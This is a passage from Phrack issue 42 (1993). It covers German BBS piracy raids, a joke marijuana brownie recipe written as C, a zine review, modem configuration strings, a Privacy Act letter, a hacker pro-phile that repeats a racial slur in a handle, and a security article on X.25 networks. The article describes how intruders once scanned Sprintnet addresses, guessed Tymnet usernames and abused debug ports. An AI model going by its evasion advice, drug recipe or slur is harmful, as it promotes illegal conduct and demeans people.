boards were affected: Beverly Hills went offline. Also the German Headquarters of the Beverly Hills Boys, 'Twilight Zone', went offline. Their sysops estimate at least 1-3 months offline time. The other Munich BBS and their sysops were really scared after the bust and took down their systems for an uncertain amount of time. One of Germany's largest BBS, Darkstar in Augsburg, was a heaven for every warez collector. It had 8 modems hooked up (all US Robotics Dual Standard 16.8) and one ISDN Line. It had over 2 GB PC warez online, and over 7 GB offline on tapes, which would be put online according to user' requests. But then, March 18 arrived, and the dream was shattered. Its sysop, Rider, who was happily calling boards the previous day, had the most shocking experience in his life. The cops came and took his BBS. And more.. Ego, co-sysop of a large German BBS, got busted. Andy/Spreadpoint (ex-sysop) got busted. And lots of others... Unlike the US Secret Service, which delights in seizing all electronic equipment, like stereos, TVs, VCRs, the German cops were just after the computer hardware, especially the hard drives and file servers. They usually come with three or four people. All of the search warrants they were using were quite old, issued last December. Who is behind those actions? First of all the BSA, Business Software Association. They were also responsible for the recent raids of US Bulletin Boards. In Germany they just announced actions against piracy and bulletin boards. The most active BSA Members are Microsoft and Lotus Development. Microsoft, Lotus and the BSA are all located in Munich, Germany, home of German's most feared lawyer, Guenther Freiherr von Gravenreuth. This guy has been fighting for years against piracy, young kids who copy games, and especially bulletin board systems. He is also affiliated with Ariolasoft, a huge German distributor for game labels like Activision and others. In the end, all I can say is: Be aware, don't get caught and don't keep illegal stuff on your board! (c) 1993 SevenUp for Phrack ****************************************************************************** Carlcory's brownies: /* Begin cc_brownie.c */ Includes: #include "4_squares_baking_chocolate" #include "1_cup_butter" #include "2_cups_sugar" #include "4_eggs" #include "2_cups_flour" #include "2_tbs_vanilla" #include "1_third_cup_marijuana" /*comment out if won't compile on your system*/ #include "1_cup_nuts" /*comment out if won't compile*/ void main(void); { heat(oven, 350); add(butter, chocolate); while(texture!='smooth') { stir(mixture); } Add(sugar); add(eggs); add(vanilla); add(flour, pot); add(nuts) for(timer=0; timer<35; timer++) { bake(mixture); } cool(hour); } /*The high takes about an hour to come on, but lasts for 12 hrs. (4 brownies) Make sure they cool (don't burn your mouth!) and share with friends! */ /*End of cc_brownie.c*/ ****************************************************************************** GRAY AREAS Examining the Gray Areas of Life Gray Areas, Inc. P.O. Box 808 Broomall, PA 19008-0808 (215)353-8238 grayarea@well.sf.ca.us Gray Areas is published quarterly and printed on recycled paper. They also participate in local recycling efforts involving cans, glass, clothing, newspapers, and more. A four-issue subscription costs $18.00 US or $26.00 foreign (payable in US funds). A 12-issue subscription costs $50.00 ($75.00 foreign). You may purchase a twelve issue subscription and give 4 or 8 or those issues away as gifts to friends (i.e., the same 4 issues you receive would also go to 2 other recipients). Make check or money order out to Gray Areas, Inc. STATEMENT OF PURPOSE: Gray Areas exists to examine the gray areas of life. We hope to unite people involved in all sorts of alternative lifestyles and deviant subcultures. We are everywhere! We felt that the government has done a great job of splitting people up so that we do not identify with other minority groups anymore. There are so many causes now that we often do not talk to others not directly involved in our chosen causes. We believe that the methods used to catch criminals are the same regardless of the crime and that much can be learned by studying how crimes in general are prosecuted and how people's morals are judged. It is our mission to educate people so they begin to case more about the world around them. Please join our efforts by subscribing, advertising your business with us, and by spreading the word about what we're up to. __________________________ Review by Knight Lightning: I recently received a copy of the premier issue of Gray Areas, dated Fall 1992 and with a cover price of $4.50 (US). I was impressed with both the laser quality of the printing, artwork, and graphics, as well as the topics and content of the articles. I would not characterize Gray Areas as a hacker magazine, but the subject did come up in an interview with John Perry Barlow (one of the original founders of the Electronic Frontier Foundation) where he discussed the EFF and its role in defending civil liberties. No, instead I think it is safe to say that Gray Areas pays a lot of attention to the Grateful Dead. Indeed the cover story is titled "Grateful Dead Unauthorized Videos." Additionally, there are several other articles (including the John Barlow interview) that discuss varying aspects about the Dead's history, their politics, and of course their music. An advertisement for the next issue of Gray Areas reveals that even more articles relating to the Grateful Dead are on the way; so if you are a "Dead Head" you will probably fall in love with this magazine! However, the article that I appreciated most was "Zine Scene," a review of 163 alternative newsletters that included such familiar names as 2600, Hack-Tic, Full Disclosure, and TAP; and others that I intend to take a look at like Iron Feather's Journal and bOING bOING. The zines reviewed here covered every topic imaginable and I thought it was a great buffet for the mind to have such handy directory (especially since Factsheet Five went defunct about a year ago). Other interesting articles had to do with video, audio, and software piracy and reviews of music and software. I also enjoyed the great artwork found throughout the magazine in the form of visual aids, comics, and advertisements. If you are a fan of alternative music or the Grateful Dead, you'll be very sorry if you don't subscribe immediately. If you are interested in alternative publications with more interesting points of view than Time or Newsweek then you owe it to yourself to at least purchase a copy to check it out. - - - - - - - - - All letters sent to Gray Areas are presumed to be for publication unless you specifically request that they omit your name or refrain from publishing your comments. If you are writing about something which could incriminate yourself, they will protect your identity as a matter of policy. ****************************************************************************** "Turning your USR Sportster w/ 4.1 roms into a 16.8K HST Dual Standard" by The Sausage with The Mallet If you have a USRobotics Sportster FAX modem, Ver 4.1, you can issue the following commands to it to turn it into an HST 16.8K dual standard. In effect, you add HST 16.8K to its V32.bis 14.4k capability. ats11=40v1L3x4&h1&r2&b1e1b1&m4&a3&k3 atgw03c6,22gw05cd,2f ats14=1s24=150s26=1s32=8s34=0x7&w A very important item is the b1, which tells the modem to use the 16.8K HST protocol. If you do not set b1, when the Sportster connects with another V32 modem it will go through the CCITT v.32 connect tones and you will not get a 16.8K connect. If you do get an HST connect, you will not hear the "normal" train phase--instead you will hear the HST negotiation which sounds like a 2400 baud carrier. Finally, if you change the "cd" in the second line to a "cb", your modem will think it is a V.32 Courier instead of an HST 16.8K. Look for other pfine pfiles from Rancid Bacon Productions in conjunction with USDA Grade A Hackers (UGAH.) Accept no substitutes. ******************************************************************************* Request to Post Office on Selling of Personal Information In May 1992, the US Postal Service testified before the US House of Representatives' Government Operations Subcommittee that National Change of Address (NCOA) information filled out by each postal patron who moves and files that move with the Post Office to have their mail forwarded is sold to direct marketing firms without the person's consent and without informing them of the disclosure. These records are then used to target people who have recently moved and by private detective agencies to trace people, among other uses. There is no way, except by not filling out the NCOA form, to prevent this disclosure. This letter is to request information on why your personal information was disclosed and what uses are being made of it. Patrons who send in this letter are encouraged to also forward it and any replies to their Congressional Representative and Senators. Eligible requestors: Anyone who has filed a change of address notice with the Postal Service within the last five years. Records Officer US Postal Service Washington, DC 20260 PRIVACY ACT REQUEST Dear Sir/Madam: This is a request under the Privacy Act of 1974 (5 USC 552a). The Act requires the Postal Service, as a government agency, to maintain an accounting of the date, nature, and purpose of each disclosure of information about individuals. I request a copy of the accounting of all disclosures made of address change and mail forwarding information that I provided to the Postal Service. This information is maintained in USPS System of Records 010.010. On or about (date), I filed a change of address notice requesting that my mail be forwarded from (old address) to (new address). The name that I used on the change of address form was (name). This request includes the accounting of all disclosures made by the Postal Service, its contractors, and its licensees. I am making this request because I object to the Postal Service's policy of disclosing this information without giving individuals an option to prevent release of this information. I want to learn how my information has been disclosed and what uses have been made of it. Please let the Postmaster General know that postal patrons want to have a choice in how change of address information is used. If there is a fee in excess of $5 for this information, please notify me in advance. Thank you for consideration of this request. Sincerely, CC: Your Congressional Representative US House of Representatives Washington, DC 20510 Your Senators US Senate Washington, DC 20515 ------------------------------------------------------------------------------- =Phrack Magazine= Volume Four, Issue Forty Two, Phile 3 of 14 ==Phrack Pro-Phile== _______________________________________________________________________________ Phrack Pro-Phile was created to provide info to you, the users, about old or highly important/controversial people. This month, we introduce you to an individual who has survived the underground for far too long, the creator of Phantom Access and one of the co-sysops of Mindvox... Lord Digital ~~~~~~~~~~~~ _______________________________________________________________________________ Personal ~~~~~~~~ Handle: Lord Digital (for like.... fuck I'm old, 13 years now) Call him: Patrick K. Kroupa Past handles: M000hahahahahahahah! You're kidding right? Handle origin: It was given to me by this ancient wise man drinking cheap Absolut by the side of the road... Date of Birth: 01/20/68 Age at current date: 24 Height: 6'2" Weight: 185 Eye color: Green Hair Color: Blonde/brunette/black (subject to change) Computer: Apple ][+, Amiga 1000, Mac Plus (All in storage) Apple //e, Amiga 500, NeXT, Various Suns (Not in storage) Sysop/Co-Sysop of: MindVox ELItE!@#!!!@#! Net address: digital@phantom.com - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - If you look beneath the shiny surface of most things, and gaze way-way-way deep down into the murky black festering heart of the human evolutionary process, you are ultimately confronted with the revelation that has stood, nay, LEAPT UP before the ancients since before the days of Atlantis: Life is a lot like NeW WaReZ. Anybody who tried to tell you something different, is obviously selling you something. All things in this universe -- and many others -- can be attributed to New WareZ. The ebb and flow of WareZ is what keeps the very COSMOS from bursting apart at the seams. During periods of time when the flow of WareZ slows to a trickle, times are tough, there is war, pestilence, death, disease, and many rAg PhIleZ. d()oDZ who were happily playing Ultima XXII Quest For Cash, are soon busily hurling insults at each other and dialing the Secret Service. Life is grim, there is a bleak sense of desolation and emptiness . . . for when the WareZ slow down . . . there is little left to live for and you begin to enter withdrawal. An ugly process that, thus far, has only been combatted successfully by Wally Hills NeW WhErEZ Treatment center, where they slowly ween you off the addiction of WareZ and introduce you to the REAL WORLD where you can do things like smoke crack and play in a band. On the flipside, when there is a good steady flow of WaReZ, the universe hums to itself in happiness and all wrongs are righted, perspectives re-adjusted, and peace, love, and happiness spread throughout the land as the COSMOS re-aligns itself and perfection sweeps the world. This is a heady time, but one that is sure to be brief, for before you know it some evil glimmer of BADNESS will rise up and somebody will DOUBLE-RELEASE someone else, or a Ware will CRASH when it tries to load . . . and then it's just all over. A long time ago in a galaxy far, far away . . . I was a founding member of the Knights Of MysterIous keYboArdZ and the Ko0l/Ra{> alliance. At present I am President/Ce0 and Chairman of the b0red at Phantom Access Technologies/Coleco ADAM design Studios, Inc. At the moment our group is working on a multi-tasking, multi-user, CyberSpace environment where the participants can take part in a shared reality that is based upon a cross-relational structure comprised of lots of 0's and 1's all strung together in big twisty chains and kept track of by an Objective-COBOL X/Motif GUI sitting on an SQL dialed into the POWER COMPUTER in Utah, at infinite baud (not to be confused with bps). In the near future I .plan to move to Pigs Knuckle Idaho and cross-breed weasels with ferrets, while devoting the rest of my life to watching daytime TV. It's just that type of thing. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Reality Break ~~~~~~~~~~~~~ It is very difficult, bordering on impossible, for me to remain serious for longer than about 45 seconds, when discussing the "underground" and what it was all about. I rarely bother to mediate or water-down most of my opinions, and there are a lotta places out there in the real world, where anyone who cares can readily access whatever I have to say. There isn't a great deal left for me to convey to anybody regarding my perceptions of the hack/phreak world's history and what it has meant, and shall mean, in the cosmic scheme of things. The first time I came into direct contact with computers was during the mid-late 70's. I was around 6 or 7 and my father worked at NCAR during this period of time, which is a futuristic looking series of buildings in Boulder Colorado. This one time I came in, there were all these weird cars driving around in the parking lot, and since there were frequently a lotta strange things moving around there, I never understood until much later that Woody Allen was filming SLEEPER when this was going on. On the same day, I was shown some of the computer rooms, which had just taken shipment on one of the first Crays to go out the door. This left an impression. It was neato . . . One thing led to another. I played around with various things, mainly the really old Commodore PET systems and a slew of heavy metal junk from IBM, until I got an Apple ][+ in 1978. I hung out with a group of people who were also starting to get into computers, most of them comprising the main attendees of the soon-to-be-defunct TAP meetings in NYC, a pretty eclectic collection of dudes who have long since gone their separate ways to meet with whatever destinies life had in store for them. Around 1980 there was an Apple Fest that we went to, and found even more people with Apples and, from this, formed the Apple Mafia, which was, in our minds, really cool sounding and actually became the first WAreZ gRoUP to exist for the Apple ][. Time passed, I picked up more hardware, went on the quest to assemble the perfect Apple-Cat system -- consisting of the Cat, 212 card, BSR, firmware, tone decoder chip, and all the m0dZ NOVATION eventually made to the boardZ -- and ultimately ended up with 3 of 'em, one of which still works (like wow). This led to the first generation of Phantom Access programs which started to seep into the moDeM WeRlD around 1983, with the final revisions being let loose in 1987 or 1988, under the auspices of Dead Lord. By this time I had long since stopped working on them and had relatively little to do with their forms of release. Over the years I've been in a seemingly-endless succession of groups and gatherings under nearly 50 different pseudonyms which were frequently invented and dropped, all around that one specific timeslice and reference-point. There were only two that I was ever "serious" about, which is to say I entered into them honestly believing the ideals and reasons for the group's inception, to be valid and worth upholding and being a part of. In other words I was in my mid-teens and my attitude wasn't one of "Yeah yeah, take 10; a buncha dudes are gonna screw around, some of it will be fun, some of it will be silly, and a lot of it will be bitchy and cranky, but hey, I'm only here to amuse myself, so what the fuck . . ." The two "serious" affiliations were Apple Mafia and the Knights of Shadow. KOS ceased to exist in mid-1984 and I dropped out of the AM around 1985, although to my knowledge it kept going until '86 or '87 when the last surviving members found better things to do with their time. In 1987 I was also "OfFphICiALlLY" inducted into the Fraternal Order of the Legion of Doom, which was just gosh w0wz0. Actually, it's much more fun in retrospect, since most of us are pretty good friends at this point in time, which seemed an unlikely event back in the early 80's I ceased to be "active" sometime around 1985, having gained legal access to almost anything I could possibly want to play with, as well as having made friends with people working for NYNEX who de-mystified many things for me. The ultimate conclusion to all of this was that having THE POWER is cool -- and using it to annoy people was absolutely hilarious -- but only led to two possible destinations. You use it all as a learning experience and "grow up" realizing that you're playing cops and robbers, and many of the things you have spent years doing are now illegal and liable to get you into a lot of trouble. You can't go back in time (at least not yet). You could keep doing stupid things and end up in a legal dilemma over something that isn't very important. Because . . . it really isn't "THE POWER," it's just a very limited form of "it" embodied by a phone system and some computers. And when you compare that to a piece of art, or a collection of music, or a new series of programs that someone has created, you begin to realize that all you're doing is fucking with things that other people made, and you're wasting your time abusing . . . To cut short my rant, I have no moral judgements to pass upon anyone or anything, because whatever it is that people do, it's some sort of learning process leading towards their destination (whether they realize it or not). The computer underground is just not a place where you can remain "active" beyond a certain period of time that serves as a sort of "rite of passage" towards that something else. To hang around indefinitely and remain "active" is to become a criminal. Almost everything I've done has taken place with a handful of friends who played various roles in events that transpired -- primary among them Dead Lord (Bruce Fancher), one of my closest friends for the better part of a decade, as well as The Unspeakable One whose name cannot be mentioned for to do so causes rifts within space/time, and a buncha dudes from NYC/NJ who for the most part want to blip their personas off the face of Cyberspace and get on with their lives without the specter of LaW EnForCEmEnT hanging over them for doing silly things as teenagers. In 1986 I ceased calling anything and didn't access a computer that was hooked into a modem until late 1990. As of late 1992, I have been "retired" for a little over 7 years. Patrick's Favorite Things ~~~~~~~~~~~~~~~~~~~~~~~~~ Women: Delia! Gorgeous, Intelligent, Wonderful, & able to deal with me. Men: Bwooooce. Cars: 928s4, Hyundai, Edsel. Foods: Italian, red meat, SuPeR Hi PER Pr0tE!n, anything with SPAM. Music: Any band with the word "LORD" in it (Lords of the New Church, House of Lords, Lords of Acid, Lords of Chaos, Traci Lords). Authors: Michael Moorcock, Sun Tzu, Machiavelli, Hans Horbiger, Dr. Seuss. Books: Play of Consciousness, The Book of PAT. Performers: Bill the Cat, Sting, Perry Farrell, GuNz N RoSeZ, plus anybody who has sold out to the mahnnnnnn fo' $$$$$$$ in a biiiiiig way. Most Memorable Experiences ~~~~~~~~~~~~~~~~~~~~~~~~~~ Most memorable things are unmentionable and destined to stay that way for a while. Those who played the games know the stories; those who didn't eventually will -- but like, who cares. Everybody should live their own stories, life's an interesting game . . . go play. Some People to Mention ~~~~~~~~~~~~~~~~~~~~~~ Dead Lord - The one who is not and can never be, yet exists. Solely an infinite layering of the possibilities inherent within personal transmigration and biotechnology? Or alive, with flesh, blood, bone and an adornment of k0dEz & warEZ? You must not be blinded by sight, nor fooled by what things appear to be when they are not, for what is a man when he has not the latest, nor possesses the abilities to acquire same? This is a question perhaps best left to the wise men who roam the meadows of the ozone, forever catching the edge and surfing the waves cresting upon the seas of thought and what is, was, and shall always be. The - I know who you are, so tell me who I am, and let's just Unspeakable get on with it okay? Because otherwise, TV is likely to One drop the entire facility dead. Anyone of normal caliber can see that to be entirely obvious to thee of the id'ness of pole-cats watching Star Wars. 8+ KlUb ElYtE. Terminus - A good friend over many years who, as most people know, has recently gone through a lot. The future looks bright, and I look forward to looking back on all this with you in another ten years. [Look, look, looking] (haga!) Magnetic Surfer - Neato guy who knew me way-back-when, and used to give me gNu Apple wArEz on cassette tape which he had downloaded at the lightning speed of 300 baud. Also provided a means to meeting many of my friends, via Sherwood Forest, when it first existed and hosted Inner Circle and later KOS. The Phantom - See above, also gave me a full set of TAP copies in 1983, which I never returned to him. The Plague - A cool guy, close friend before his fatal accident when the truck went off the road near Poker Flats, just 5 miles north of Pig's Knuckle, ID. Tragic, hope he's happy in his new home, far, far underground, running the world's first afterlife/subterranean BBS. ApPul HeyD! \ The elYtE peARz of Scepter/InterCHAT who went on to form SuperNigger > - DPAK, an entity SO ELITE that it required FOUR letters for Sharp Rem0b / its acronym & brought the world Lex Luthor on HBO! SuperNigger - Because he is 2 elyTe to be encompassed in merely one line and requires at least two. Lord_foul - Ahhhh do0d.... Well we all have our roles 2 play. Catch ya in tha outback. (cha mod pla foul sl=999 mi=99,mh=99) Ninja NYC - One of the few people I have ever met who seems to have mastered the art of being happy wherever he is, doing whatever he happens to be doing. An exceptionally nice human being. Elven Wizard \ A collection of compatriots, cohorts, and all around dudEz The Infiltrator\ with whom I had an inordinate amount of fun, first ro0l!ng The Gunslinger > - the WhEReZ world, then changing our handles (well except The Bishop / for Jeff) & dismantling eliteness and its tarnished allure, The Gonif / along with its cadre of false prophets (namely ourselves under half a dozen other handles). Andrew \ "I doan' wannnnnnnnnt any money, I want to be left alone, Chase > - tell them to go 'way." May Sutekh look upon our worldly Asif / endeavors and bless us all, everyone. !nseo()d! Phantom Phreaker - Here's to shifting focus and finding something far more interesting to play with than phones & computers 8-). It's an amazing universe, huh . . . Lex Luthor - After a ten year period during which we typed to each other once in a while and seemed situated at antipodean sides of the m0dUm Yo0n!veRsE, I finally met with Lex in the very near past. It's shocking to find that he's actually one of the most gracious, funny, and pleasant guys I've ever had an opportunity to meet. Best wishes in whatever you may end up doing! Erik Bloodaxe - A keg of Sandoz, a Vat of pig's blood, T&C and thee. Sigmund!@31!@!!! - As the UFOs said, they know who you are, they know where you are. Seriously, hey, it was entertaining. Good luck man. unReAl PeOpUL 2 MenShun ~~~~~~~~~~~~~~~~~~~~~~~ StJude - For everything. It's good to know you . . . love, light, and a lotta deep-fried giri with ciphers thrown in. Siva - Look, polygons or voxels, Gibsonian or Post-modern, by Risc or by Cisc with Objective C++ running Smalltalk under Windows NT over the underpass and around the bend; it's gonna happen, and we're gonna be there having a party. Smile, as I think you've mentioned on more than one occasion; it's an interesting time to be alive 8-). Bruce - Quite possibly the coolest grown-up I have ever met 8-). Which is Sterling saying a lot. The world would be a much better place if Bruce could be cloned and then placed inside a tornado, hooked into a net, fitted with an adamantium exoskeleton, and then dropped into the de-criminalized zone with a BigMac and a holographic tape recorder. Jim - Hey so, are you doing more things at once or am I? I bet I can Thomas watch TV, listen to music, have three phone conversations, and write an article with 25% greater coherence than Chuck has while eating and watching TV. On the other hand, writing two books, teaching, reading, running CUD, having a life, and still finding time to hang out are at least level 15 -- haven't hit that yet, but I'm working on it! Andy - Hey man. I enjoy what you're doing, keep the faith, ignore the Hawks assholes, take inspiration from the inspired, and retain belief in your dreams. Oh okay, gotta go, time to sell out, ignore what I just said 8-). 3Jane - Models/actresses/sex cadets united for a better tomorrow, under Unix with named_pipes and justice for some of us. Memorable Phreak/Hack BBSes ~~~~~~~~~~~~~~~~~~~~~~~~~~~ 8BBS - Long ago, I didn't understand it, or what I was typing, but it was fun. MOM - Long ago, although by now I did understand it and had slightly less fun. Pirate's Harbor - Before Norman figured out he could make a killing on TIMECOR. Pirate's Chest - 6 line 80 meg board circa 1983. Totally Cool. Adventurer's Tavern - Last bastion of tremendous on-line fun & anarchy. RIP. Securityland - Nappy's Board. Pirate's Phunhouse -> Cat's Cavern - The Tempest's system(s). Dark Side of the Moon - Through many long and strange phases. Still running. RACS III - w()wZ0 blargel blumpfk0l SwillY sw()nk!@!#!@!!!!! OSUNY (3 cycles) - Some more fun than others. Sherwood Forest I, II, III - Liked all three, although 1 was the coolest. Plovernet - Two phases. Both great. The (urse - WarEZ do()d & eLIteNEsS Galore!@#!@#!@#!@# LOD - The Start in 1984, and intermittently thereafter. COPS - Cool Florida board. Shadowland - Cool Colorado board. SpecELITE - So overwhelmingly awful, that it was wonderfully fun. WOPR - Lotta fun for a while, then he threw everyone off & went 1200only wareZ. Pirate-80 - It was very effervescent with a touch of jello. Everything Sir Knight ever ran - Too many names (Tele-Apa, HackNet, NewsNet...) World of Cryton - WOC! JAMES! ELITENESS! The Safehouse - Apple Bandit's. Hey, I want my Diskfer ][ dude! Farmers of Doom - Blo0p. Pirates of Puget Sound - Nice softwareZ. Lotta fun. A few things Lord Digital would like to say: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ BELIEVE EVERYTHING THAT YOU HEAR. KNOW EVERYTHING YOU SEE. UNDERSTAND EVERYTHING YOU DO NOT COMPREHEND. BE AT ONE WITH THE STILLNESS OF THE REVOLVING HAMSTER WHEEL AND FLOSS BETWEEN MEALS. As far as the future of the hack/phreak world and telecommunications in general is concerned, the PhrAck World is absolutely spiffy and I believe that ISDN will change EVERYTHING and make it rounder, taller, bigger, more stable, and also give later generations something to look back upon and sneer at with contempt. ==Phrack Magazine== Volume Four, Issue Forty-Two, File 4 of 14 Prelude to a Kiss - Lessons Unlearned Are Doomed To Bring Misery Ad-Infinitum - The following is an article I wrote for a mainstream computer security periodical called ISPNews. At the time, I had been discussing the idea of a bi-monthly column with the editor at that time, Len Spitz. (Now the editor is Michael Alexander, ex-of Computerworld) The following article, although very, very tame by my standards, and admittedly lacking in enough hardcore information to help security professionals to apply a quick fix to their many problems, caused quite a stir among the folks at ISPNews. Since this article was from me, a self-proclaimed hacker, it underwent an extraordinary amount of scrutiny. Rather than be accepted or denied by the editor, my article got the dubious honor of being sent before an editorial advisory board. I checked every back issue of ISPNews and could find no mention of such an entity until the November/December 1991 issue, the issue immediately following an length interview with none other than myself. When I questioned Len Spitz about this rather odd fact, he maintained that this committee had indeed existed, but stammered his way through my question to name any other article that they had convened to judge in the past, and to explain the duties of such a group. He could not give me any answers. The group itself was obviously geared to be a type of kangaroo-court. It consisted of: William J. Cook -- The man who less than two years prior had ordered my privacy and civil rights violated by the Secret Service solely on the basis of two bulletin board posts and my association with members of the Legion of Doom and the Phrack Magazine staff. William H. Murray -- A senior consultant with Deloitte & Touche who had two weeks prior stood up before my presentation to the MIS Training Institute's 11th Annual Conference and said loudly "I can't take this any more, I'm leaving," to the astounded audience. The man who went on to state in his own column in ISPNews, "Can we lie down with dogs and get up without fleas?" and "Ask yourself if you wish to work in a profession populated by rogues. Ask yourself if you want your reputation mixed with theirs." Winn Schwartau -- A security consultant with a broad view and an open mind, undoubtedly resulting from his background in the music industry, as opposed to the bean-counting world of MIS. David J. Stang -- Director of research, NCSA. Noted virus specialist. This was the group. Here is what they said about my article: Bill Cook -- "It's very well-written and informative, but shouldn't be published for legal reasons." (What those reasons might have been were not stated, nor did Mr. Cook return my call to his office.) Bill Murray -- Was not even given the file to read, as his response was deemed to predictable. Winn Schwartau -- "Publish it. This is valuable information." David Stang -- Was not given the file because, according to Len Spitz "David is just a virus expert, and this isn't in his arena, so we gave it to Ray Kaplan." Ray Kaplan -- Did not want to comment on it because he said, "It's not my expertise, so I gave it to a friend." I believe Ray did not want to get involved with anything having to do with hackers after the reactionary attitudes of the DECUS attendees towards his defense of Kevin Mitnik that nearly left him in bankruptcy. I cannot blame him at all. (Hell, I like the guy...he's certainly more brazen with attitude these days, I mean, he went to HoHoCon for God's-sake!) Ray's Friend -- "This is of absolutely no use to the information security professional, but of great use to the hacker community." I still do not know who Ray's "friend" was. I hope his Alzeheimer's has subsided since this comment. Needless to say, the article went unpublished. Shortly thereafter I received a letter from Robert Fox, an assistant vice-president at Sprint. Somehow my little article had snaked its way over to Kansas City. It's amazing how one faxed copy of an article could have reached so many people in such a short period of time. Mr. Fox had the following to say: ------------------------------------------------------------------------ United Telecom/US Sprint 9221 Ward Parkway Kansas City, Missouri 64114 816-822-6262 Robert F. Fox January 13, 1992 Assistant Vice President Corporate Security VIA AIRBORNE EXPRESS Mr. Chris Goggans COMSEC Suite 1470 7322 Southwest Freeway Houston, TX 77074 Re: Your Article "Packet-switched Networks Security Begins With Configuration" Dear Mr. Goggans: A copy of the referenced unpublished article, which is enclosed with this letter, has come to our attention. After review, we believe the article is inaccurate and libelous. If published the contents of the article could cause damage to Sprint customers, Sprint and our reputation, and we request that you not publish or otherwise disseminate it. In addition, we believe some of the information contained in the article has been obtained through violation of the property rights of Sprint and/or our customers and we demand that you cease any efforts or attempts to violate or otherwise compromise our property whether or not for you personal financial gain. Sincerely, Robert F. Fox Enclosure ------------------------------------------------------------------------ Regardless of how Mr. Fox came into possession of this article, i have to question his letter based on his comments. First he states that the information is almost criminally incorrect and could cause harm to Sprint's reputation. Then he states that information in the article has come to be known through the violation of the security of Sprintnet and/or clients of Sprintnet. In effect, I am both a thief and a liar according to Mr. Fox. Well, if I were a thief the information could not possibly be inaccurate if it were obtained from Sprintnet or its clients. If I was a liar, why would they think the information came from themselves and/or their clients? Mr. Fox's thinly veiled threat caused me great amusement. I then decided no mainstream publication would touch this article. I don't know why everyone is so scared of the truth. Perhaps if the truth were known people would have to work, and perhaps if the truth were known some people would be out of work. None of this is of concern to me anymore. I am here to speak the truth and to provide uncensored information gathered from a variety of sources to provide readers of this magazine the facts they need to quench their thirst for knowledge. This article is included as a prelude to a series of articles all based on packet switched networks as related to information merely alluded to in my harmless little article. To our readers, "enjoy." To the cowering so-called security experts, "kiss my ass." ------------------------------------------------------------------------ Packet-switched Networks Security Begins with Configuration For many companies the use of packet-switched networks has allowed for increased interconnectivity of systems and easy remote access. Connection to a major public packet-switched network brings increased access points with local dialups in many cities around the nation as well as access points from foreign countries. With the many obvious benefits provided by this service, improper configuration of either the host's connection to the network or of the network itself can lead to extreme security problems. The very connection to a public packet-switched network immediately increases the exposure of that particular system. America's two major commercial networks, BT-Tymnet and Sprintnet, are probably the most popular US targets for hackers around the world. The wealth of systems available on these two networks has provided hackers with a seemly endless supply of sites on which to sharpen their skills. The ease of use inherent in both networks makes them popular for legitimate users as well as illegitimate users. The Telenet software utilized in the Sprintnet network allows users to enter a network user address (NUA) in the standard format as outlined in the X.121 numbering standard: DDDDAAAHHHHHPP Where D = the four digit data network identifier code (DNIC) A = the three digit area code corresponding to the host H = the host address P = the port or (sub) address On domestic calls the DNIC for Sprintnet (3110) is stored in all Sprintnet equipment and is used as the default. By merely picking an area code, most often corresponding to the standard area codes of the North American Numbering Plan, and an additional one to five digits a would-be intruder can connect to any number of systems while looking for targets. In the past many software packages have been written to automate this process, and large scans of the network have been published in a variety of underground media. The Tymnet II software utilized in BT's Tymnet prompts the user for a mnemonic which corresponds to a host or number of hosts. The mnemonic, or username, is referenced to a fixed host address in the network's Master User Directory (MUD). This username may allow the caller to connect to a variety of sites, as opposed to merely one, by entering additional information in separate fields after the username. It may also correspond to a network gateway thereby allowing the user to enter a number in the X.121 format and connect to that specific site. This particular network, with its primary use of words as opposed to numbers, has been compromised by intruders who guess common words or names in their attempts to connect to remote sites. Each network has its own particular set of problems but solutions to these problems are both simple and quick in implementation. SPRINTNET The first deterrence in securing a host on this network is to restrict access to the site. This can be accomplished in a number of ways. The most obvious is to have the site refuse collect calls. All calls on Sprintnet are reverse-billed, unless the site has specifically asked that they not be billed for incoming calls. This makes the site accessible only through the use of a Network User Identifier (NUI). Another method of restricting access from intruders is to place the host in a closed user group (CUG). By electing to have the host in a CUG, the administrator can allow only certain NUIs to connect, and can also restrict the actual addresses from which access is allowed. For example: A site is placed in a CUG that will allow only calls from the company's remote branch in Dallas to access the host and only with the NUI created specifically for that branch. All attempts to access the site from an address outside the 214 area will result in an error message indicating an invalid source address. All attempts to connect with an invalid NUI will result in an error indicating an invalid ID. This information is maintained in the networks main TAMS (TP Access Management System) database, and is not subject to manipulation under normal circumstances. Many sites on the Sprintnet network have specific subaddresses connecting to a debug port. This is usually at subaddress 99. All connections to debug ports should be restricted. Allowing users access to this port will allow them the ability to load and display memory registers of the Sprintnet equipment connected to the port, and even reset as well as enable or disable the host. Most debug ports are equipped with preset passwords from the vendor, but should be changed. These ports should also restrict connection from all addresses except those specified by the company. An additional measure that may foil intruders relying on software programs to find all addresses in a given area code is to request that the host be given an address above 10000. The time involved in scanning the network is extensive and most casual intruders will not look past the 10000 range. In fact, many will not venture past 2000. BT-TYMNET Any company having a host on the Tymnet network should choose a username that is not easily associated with the company or one that is not a common word or name. If an intruder is aware that XYZ Inc. has a UNIX based system on TYMNET he or she would begin attempts to find this system with the obvious usernames: XYZ, XYZINC, XYZNET, XYZ1, XYZUNIX, UNIX, etc. BT-Tymnet allows for these usernames to have additional password security as well. All hosts should have this option enabled, and passwords should be changed frequently. The password should always be a minimum of six digits, should include letters, numbers and at least one symbol character, and should not be associated in any way with the corresponding username. Many clients of BT-Tymnet have purchased the Tymnet II software and have individual sub-networks that are linked to the public network through gateways. Each subnet is personally configured and maintained through the use of a package of utilities provided by Tymnet. These utilities each perform a specific task and are highly important to the smooth operation of the network. These utilities may be accessed either directly from the host-end or remotely through the network by entering a corresponding username. Some of these utilities are: XRAY : a monitoring utility DDT : a debugging utility NETVAL : a database of username to host correspondence PROBE : a monitoring utility TMCS : a monitoring utility Under NO CIRCUMSTANCES should these utilities be left without a password on the company's subnet. These utilities should also never be named similarly to their given name. Should an intruder gain access to any of these utilities the integrity of your network will be at risk. For example: Allowing an outsider access to the XRAY utility, would give he or she the ability to monitor both incoming and outgoing data from the host using the "TA" command (display trace data table in ASCII). Use of certain XRAY commands are restricted by a security function that allows only certain usernames to execute commands on the basis of their existence in a "Goodguy" list, which can be displayed by any XRAY user. Should a user be of the highest privilege, (2), he or she can add or delete from the "Goodguy" list, reset connections, and display trace data on channels other than the default channel. Allowing a user access to DDT can result in complete disruption of the network. DDT allows the user the ability to write directly to the network controller "node code" and alter its configuration. 